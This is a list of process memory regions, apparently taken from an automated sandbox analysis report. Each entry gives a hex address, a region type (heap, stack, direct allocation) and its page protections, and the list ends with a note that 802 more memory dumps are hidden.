page read and write
5210000
heap
page read and write
925000
heap
page read and write
5248000
heap
page read and write
5E74000
heap
page read and write
3640000
direct allocation
page read and write
995000
heap
page read and write
9BE000
stack
page read and write
6969000
heap
page read and write
6F92000
direct allocation
page read and write
F70000
heap
page read and write
6610000
trusted library allocation
page read and write
94F000
heap
page read and write
7801000
heap
page read and write
175F000
stack
page read and write
6982000
heap
page read and write
976000
heap
page read and write
605D000
heap
page read and write
9DB000
heap
page read and write
6041000
heap
page read and write
526A000
heap
page read and write
697D000
heap
page read and write
6087000
heap
page read and write
3380000
heap
page readonly
137C000
stack
page read and write
60DE000
trusted library allocation
page read and write
5FC3000
heap
page read and write
394F000
stack
page read and write
5218000
trusted library allocation
page read and write
751E000
stack
page read and write
695C000
heap
page read and write
6939000
heap
page read and write
3A2D000
heap
page read and write
39B0000
direct allocation
page read and write
47CF000
heap
page read and write
6969000
heap
page read and write
692E000
heap
page read and write
698F000
heap
page read and write
6983000
heap
page read and write
6087000
heap
page read and write
6300000
trusted library allocation
page read and write
698F000
heap
page read and write
3823000
heap
page read and write
3213000
heap
page read and write
6974000
heap
page read and write
6256000
trusted library allocation
page read and write
8958000
heap
page read and write
390D000
direct allocation
page read and write
699F000
heap
page read and write
39A0000
direct allocation
page read and write
There are 802 hidden memdumps, click here to show them.